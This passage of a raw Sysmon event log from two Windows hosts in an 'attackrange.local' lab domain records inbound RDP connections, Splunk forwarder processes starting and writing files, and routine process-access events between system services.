09:17:52.522{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C5F3D0E6C2D1D37AD170158F906EC3,SHA256=A56E55BE50AB901394A968C7CEEA87DF35B866C88A06890E212F775E72BB1FAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:48.643{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-53289-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:52.202{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8A3D8F148841A9DC5389C92812F9FA6,SHA256=F855EFED3582C9381E827EA5FAF4BB694787DFF8B44CF3AC8AD15F7690F88EA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:51.986{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63409-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:51.361{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com64029-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:53.764{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD143147130F672A6FA793B2B4E8A563,SHA256=E031DB53780F17419E2A4110C3D2502703121A110D9207BD87D8D6391B56BE5A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:50.678{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63221-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:53.514{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E890F73A9904E10FDDD37F2434AD0DE2,SHA256=3485A357C893B7167DD51A864D9943E01A1DD6796508EE5DD63629700D07882A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:53.217{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C5261AF5C95FE39648545497C1A25C,SHA256=E2A11314F8C75A7CDDEA5B072DF1AFFB29DC7145E58A201F8909F67C9477218D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.895{5EBD8912-8C42-6151-617A-00000000FC01}53964600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.794{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0A9E1CE5C75474F9F6B62157E7070B1,SHA256=A545EC329C75C9855B599DFA6E46985A6919923FFA27DB08642D0F0C4882B910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:54.233{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9447C128A4F6BF1B9055206E1EFAC55F,SHA256=5674F7EB2957C3550FE0EF09FFF80F0D718CABFD4EFF12302B10AD2A8FAFDAF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C42-6151-617A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8C42-6151-617A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.695{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C42-6151-617A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.680{5EBD8912-8C42-6151-617A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.379{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.379{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.379{5EBD8912-7F2D-614D-0B00-00000000FC01}6244660C:\Windows\system32\lsass.exe{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.279{5EBD8912-8C41-6151-607A-00000000FC01}55844408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.063{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BA61C11E2D7D7AD11FF10C02A90145C,SHA256=4DAEEFAB0F8F97A9EB23E690D83DC597150303C783F60DFD610C9DACF3725809,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.042{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C41-6151-607A-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.010{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C41-6151-607A-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.010{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.010{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.010{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.010{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:54.010{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C41-6151-607A-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:53.980{5EBD8912-8C41-6151-607A-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:55.978{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C43-6151-637A-00000000FC01}7084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 